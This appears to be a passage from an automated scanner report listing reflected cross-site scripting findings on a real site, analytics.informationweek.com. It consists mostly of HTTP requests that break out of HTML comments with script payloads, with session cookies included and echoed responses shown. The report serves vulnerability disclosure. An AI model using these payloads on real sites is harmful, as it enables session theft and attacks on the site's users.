HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:42:07 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:42:13 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2d612bfec11&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html772ba--><script>alert(1)</script>2d612bfec11"> ...[SNIP]...
3.45. http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload af5ae--><script>alert(1)</script>57fed5e992d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1/Application-optimization/Application-performance-optimization.html?af5ae--><script>alert(1)</script>57fed5e992d=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... script%3Ealert%281%29%3C%2Fscript%3E57fed5e992d%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html?af5ae--><script>alert(1)</script>57fed5e992d=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 13258--><script>alert(1)</script>d54dc696a59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu13258--><script>alert(1)</script>d54dc696a59/10/Messaging-and-collaboration/Messaging-collaboration.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:44:58 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:58 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... --%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed54dc696a59%2F10%2FMessaging-and-collaboration%2FMessaging-collaboration.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu13258--><script>alert(1)</script>d54dc696a59/10/Messaging-and-collaboration/Messaging-collaboration.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 9c016--><script>alert(1)</script>7e4d87e08f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/109c016--><script>alert(1)</script>7e4d87e08f/Messaging-and-collaboration/Messaging-collaboration.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:11 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:11 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 016--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7e4d87e08f%2FMessaging-and-collaboration%2FMessaging-collaboration.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/109c016--><script>alert(1)</script>7e4d87e08f/Messaging-and-collaboration/Messaging-collaboration.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload e9aa2--><script>alert(1)</script>6407169f2c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/10/Messaging-and-collaboratione9aa2--><script>alert(1)</script>6407169f2c9/Messaging-collaboration.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:23 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:23 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 9aa2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6407169f2c9%2FMessaging-collaboration.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10/Messaging-and-collaboratione9aa2--><script>alert(1)</script>6407169f2c9/Messaging-collaboration.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload f552e--><script>alert(1)</script>256d5dde1af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/10/Messaging-and-collaboration/Messaging-collaboration.htmlf552e--><script>alert(1)</script>256d5dde1af HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:36 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:36 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... lf552e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E256d5dde1af&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.htmlf552e--><script>alert(1)</script>256d5dde1af"> ...[SNIP]...
3.50. http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload aa634--><script>alert(1)</script>9cd1610281f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/10/Messaging-and-collaboration/Messaging-collaboration.html?aa634--><script>alert(1)</script>9cd1610281f=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9cd1610281f%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html?aa634--><script>alert(1)</script>9cd1610281f=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ea5fc--><script>alert(1)</script>808f19a7df2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menuea5fc--><script>alert(1)</script>808f19a7df2/104/Government/Government.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:44:52 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:52 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... formationweek.com%2Fmenuea5fc--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E808f19a7df2%2F104%2FGovernment%2FGovernment.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menuea5fc--><script>alert(1)</script>808f19a7df2/104/Government/Government.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2c544--><script>alert(1)</script>890b31067f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1042c544--><script>alert(1)</script>890b31067f8/Government/Government.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:09 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:09 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ationweek.com%2Fmenu%2F1042c544--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E890b31067f8%2FGovernment%2FGovernment.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1042c544--><script>alert(1)</script>890b31067f8/Government/Government.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 505ac--><script>alert(1)</script>edbecabc005 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/104/Government505ac--><script>alert(1)</script>edbecabc005/Government.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:16 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:16 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... om%2Fmenu%2F104%2FGovernment505ac--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eedbecabc005%2FGovernment.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/104/Government505ac--><script>alert(1)</script>edbecabc005/Government.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 132d0--><script>alert(1)</script>52b1d0b102f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/104/Government/Government.html132d0--><script>alert(1)</script>52b1d0b102f HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:31 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2FGovernment%2FGovernment.html132d0--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E52b1d0b102f&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/104/Government/Government.html132d0--><script>alert(1)</script>52b1d0b102f"> ...[SNIP]...
3.55. http://analytics.informationweek.com/menu/104/Government/Government.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/104/Government/Government.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bf725--><script>alert(1)</script>b4e47d4b98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/104/Government/Government.html?bf725--><script>alert(1)</script>b4e47d4b98=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nment%2FGovernment.html%3Fbf725--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb4e47d4b98%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/104/Government/Government.html?bf725--><script>alert(1)</script>b4e47d4b98=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 71898--><script>alert(1)</script>7193a7d29ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu71898--><script>alert(1)</script>7193a7d29ad/105/Healthcare/Healthcare.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:00 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:00 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... formationweek.com%2Fmenu71898--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7193a7d29ad%2F105%2FHealthcare%2FHealthcare.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu71898--><script>alert(1)</script>7193a7d29ad/105/Healthcare/Healthcare.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 54cf2--><script>alert(1)</script>109941c14ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/10554cf2--><script>alert(1)</script>109941c14ca/Healthcare/Healthcare.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:12 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:12 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ationweek.com%2Fmenu%2F10554cf2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E109941c14ca%2FHealthcare%2FHealthcare.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10554cf2--><script>alert(1)</script>109941c14ca/Healthcare/Healthcare.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload a6df7--><script>alert(1)</script>5ba8d7732fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/105/Healthcarea6df7--><script>alert(1)</script>5ba8d7732fd/Healthcare.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:19 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:19 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... om%2Fmenu%2F105%2FHealthcarea6df7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E5ba8d7732fd%2FHealthcare.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/105/Healthcarea6df7--><script>alert(1)</script>5ba8d7732fd/Healthcare.html"> ...[SNIP]...
